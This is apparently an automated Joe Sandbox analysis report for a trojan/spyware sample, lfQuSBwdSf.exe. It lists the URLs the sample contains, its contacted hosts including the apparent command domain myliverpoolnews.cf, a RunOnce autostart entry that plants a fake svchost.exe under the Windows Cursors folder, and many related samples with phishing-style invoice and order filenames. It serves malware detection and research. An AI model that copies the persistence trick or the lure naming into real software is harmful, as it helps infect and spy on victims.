                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/all-about/steven-gerrardlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-ozan-kabak-future-audition-19954616lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s458/1_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-penalties-premier-league-var-17171391lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schema.org/NewsArticlelfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                              high
                                              https://www.liverpool.com/schedule/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://www.liverpool.com/liverpool-fc-news/featureslfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://schema.org/BreadcrumbListlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                high
                                                https://securepubads.g.doubleclick.net/tag/js/gpt.jslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://contoso.com/Licensepowershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://s2-prod.liverpool.com/lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-champions-league-jurgen-klopp-1996194lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s458/0_GettyImages-1302496803.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://myliverpoolnews.cf4&llfQuSBwdSf.exe, 00000000.00000002.345654171.00000000030F0000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
                                                  https://felix.data.tm-awx.com/ampconfig.json&quot;lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s615/0_GettyImages-1273716690.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-andy-robertson-valuable-quality-19946lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.liverpool.com/liverpool-fc-news/features/liverpool-jurgen-klopp-pressing-tactics-1993836lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schema.org/ListItemlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://www.liverpool.com/all-about/georginio-wijnaldumlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://mab.data.tm-awx.com/rhs&quot;lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://felix.data.tm-awx.comlfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.liverpool.com/all-about/andrew-robertsonlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/liverpool-gini-wijnaldum-rumours-fitness-199533lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-199590lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.liverpool.com/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://myliverpoolnews.cflfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.liverpool.com/all-about/transferslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763&lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

Contacted IPs

Public

IP              Domain              Country        ASN    ASN Name         Malicious
162.88.193.70   checkip.dyndns.com  United States  33517  DYNDNSUS         false
104.21.56.119   myliverpoolnews.cf  United States  13335  CLOUDFLARENETUS  false
172.67.188.154  freegeoip.app       United States  13335  CLOUDFLARENETUS  false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 383847
Start date: 08.04.2021
Start time: 11:00:51
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 19m 21s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: lfQuSBwdSf.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 40
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@49/25@11/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 6.8% (good quality ratio 1.4%)
• Quality average: 11.3%
• Quality standard deviation: 23.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 23.54.113.53, 52.255.188.83, 40.88.32.150, 104.43.193.48, 95.100.54.203, 168.61.161.212, 20.82.210.154, 13.64.90.137, 93.184.221.240, 23.10.249.26, 23.10.249.43, 13.88.21.125, 20.54.26.129, 20.50.102.62, 52.155.217.156
• Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    Time     | Type            | Description
                                                    11:02:03 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIln C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    11:02:04 | API Interceptor | 2x Sleep call for process: svchost.exe modified
                                                    11:02:11 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce wyreCRIln C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe
                                                    11:02:38 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                    11:02:55 | API Interceptor | 130x Sleep call for process: powershell.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    162.88.193.70 | RFQ 100400806 SUPPLY.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | SER09090899.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | MUYR09080.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | PURCHASE ORDER-34002174, pdf.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | Order CG-210331-1004.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | Invoice,PDF.exe.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | ej 9999999.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | DHL FINAL REMINDER PDF.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | Statement For Month..exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | New Revised.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | PO_3351_60_20.doc | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | SMA0908800.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | SecuriteInfo.com.ArtemisCEDC6E147EF2.27473.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | NEW ORDER.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | INV0000075.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | SWIFT COPY.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | tRuJwJgMos.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | RfTQP.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | Payment advice IMG_417_302_680.exe | Get hash | malicious | Browse | checkip.dyndns.org/
                                                    162.88.193.70 | A7aLfLs0oa.exe | Get hash | malicious | Browse | checkip.dyndns.org/

                                                    Domains

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    myliverpoolnews.cf | RFQ-034.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | ACdEbpiSYO.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | Invoice_ord00000009.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | kayo.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | new_order20210408_14.doc | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | BL01345678053567.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | new_order20210408_14.doc | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | DHLdocument11022020680908911.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | 20200804-8293847pdf.scr.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | 234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | items list.doc | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | SKMC25832100083932157.jar | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | Krishna Gangaa Enviro System Pvt Ltd.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | PO75773937475895377.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | New Order.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | RFQ #46200058149.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    myliverpoolnews.cf | Payment Slip E05060_47.doc | Get hash | malicious | Browse | 104.21.56.119
                                                    myliverpoolnews.cf | New Orders.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    freegeoip.app | PURCHASE ORDER - XIFFA55,pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | PRICE_QUOTATION_RFQ_000988_PDF.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | RFQ 100400806 SUPPLY.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | SER09090899.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | PURCHASE ORDER-34002174,pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | cricket.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | EMPRESA SUMPEX TRADE.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | Yeni siparis _WJO-001, pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | Dringende RFQ_AP75887658_98788,pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | MUYR09080.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | PURCHASE ORDER-34002174, pdf.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | Order CG-210331-1004.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | Yeni siparis _WJO-001, pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | Invoice,PDF.exe.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | Payment Slip E05060_47.doc | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | PROFORMA INVOICE.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | Confirmation_(#1422) DEKRA order,pdf.exe | Get hash | malicious | Browse | 104.21.19.200
                                                    freegeoip.app | ATTACHED.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    freegeoip.app | Urgent RFQ_AP65425652_040621,pdf.exe | Get hash | malicious | Browse | 104.21.19.200

                                                    ASN

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    CLOUDFLARENETUS | AQJEKNHnWK.exe | Get hash | malicious | Browse | 23.227.38.74
                                                    CLOUDFLARENETUS | hvEop8Y70Y.exe | Get hash | malicious | Browse | 172.67.219.254
                                                    CLOUDFLARENETUS | RFQ-034.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    CLOUDFLARENETUS | ACdEbpiSYO.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    CLOUDFLARENETUS | PURCHASE ORDER - XIFFA55,pdf.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    CLOUDFLARENETUS | Invoice_ord00000009.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    CLOUDFLARENETUS | PRICE_QUOTATION_RFQ_000988_PDF.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    CLOUDFLARENETUS | kayo.exe | Get hash | malicious | Browse | 172.67.150.212
                                                    CLOUDFLARENETUS | nicoleta.fagaras-DHL_TRACKING_1394942.html | Get hash | malicious | Browse | 104.16.18.94
                                                    CLOUDFLARENETUS | 000OUTQ080519103.pdf.exe | Get hash | malicious | Browse | 172.67.164.131
                                                    CLOUDFLARENETUS | PO7321.exe | Get hash | malicious | Browse | 172.67.154.93
                                                    CLOUDFLARENETUS | PRC-20-518 ORIGINAL.xlsx | Get hash | malicious | Browse | 104.25.233.53
                                                    CLOUDFLARENETUS | RFQ 100400806 SUPPLY.exe | Get hash | malicious | Browse | 172.67.188.154
                                                    CLOUDFLARENETUS | ikoAImKWvI.exe | Get hash | malicious | Browse | 104.25.233.53
                                                    CLOUDFLARENETUS | new_order20210408_14.doc | Get hash | malicious | Browse | 172.67.150.212
                                                    CLOUDFLARENETUS | BL01345678053567.exe | Get hash | malicious | Browse | 104.21.56.119
                                                    CLOUDFLARENETUS | invoice.xlsx | Get hash | malicious | Browse | 104.25.233.53
                                                    CLOUDFLARENETUS | new_order20210408_14.doc | Get hash | malicious | Browse | 172.67.150.212
                                                    CLOUDFLARENETUS | PR_A1191-04052021.xlsx | Get hash | malicious | Browse | 104.25.233.53
                                                    CLOUDFLARENETUS | DYANAMIC Inquiry.xlsx | Get hash | malicious | Browse | 104.21.61.102
                                                    DYNDNSUS | PURCHASE ORDER - XIFFA55,pdf.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | PRICE_QUOTATION_RFQ_000988_PDF.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | RFQ 100400806 SUPPLY.exe | Get hash | malicious | Browse | 162.88.193.70
                                                    DYNDNSUS | SER09090899.exe | Get hash | malicious | Browse | 162.88.193.70
                                                    DYNDNSUS | PURCHASE ORDER-34002174,pdf.exe | Get hash | malicious | Browse | 131.186.161.70
                                                    DYNDNSUS | cricket.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | EMPRESA SUMPEX TRADE.exe | Get hash | malicious | Browse | 216.146.43.70
                                                    DYNDNSUS | Yeni siparis _WJO-001, pdf.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | Dringende RFQ_AP75887658_98788,pdf.exe | Get hash | malicious | Browse | 216.146.43.70
                                                    DYNDNSUS | MUYR09080.exe | Get hash | malicious | Browse | 162.88.193.70
                                                    DYNDNSUS | PURCHASE ORDER-34002174, pdf.exe | Get hash | malicious | Browse | 162.88.193.70
                                                    DYNDNSUS | Order CG-210331-1004.exe | Get hash | malicious | Browse | 162.88.193.70
                                                    DYNDNSUS | Yeni siparis _WJO-001, pdf.exe | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | Invoice,PDF.exe.exe | Get hash | malicious | Browse | 216.146.43.70
                                                    DYNDNSUS | Payment Slip E05060_47.doc | Get hash | malicious | Browse | 131.186.113.70
                                                    DYNDNSUS | PROFORMA INVOICE.exe | Get hash | malicious | Browse | 216.146.43.70
                                                    DYNDNSUS | Confirmation_(#1422) DEKRA order,pdf.exe | Get hash | malicious | Browse | 216.146.43.71
                                                    DYNDNSUS | ATTACHED.exe | Get hash | malicious | Browse | 216.146.43.71
                                                    DYNDNSUS | Urgent RFQ_AP65425652_040621,pdf.exe | Get hash | malicious | Browse | 131.186.113.70

                                                    JA3 Fingerprints

                                                    Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | RFQ-034.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | ACdEbpiSYO.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | PURCHASE ORDER - XIFFA55,pdf.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | Invoice_ord00000009.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | kayo.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | RFQ 100400806 SUPPLY.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | new_order20210408_14.doc | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | BL01345678053567.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | SER09090899.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | PURCHASE ORDER-34002174,pdf.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
                                                    54328bd36c14bd82ddaa0c04b25ed9ad | cricket.exe | Get hash | malicious | Browse | 104.21.56.119, 172.67.188.154
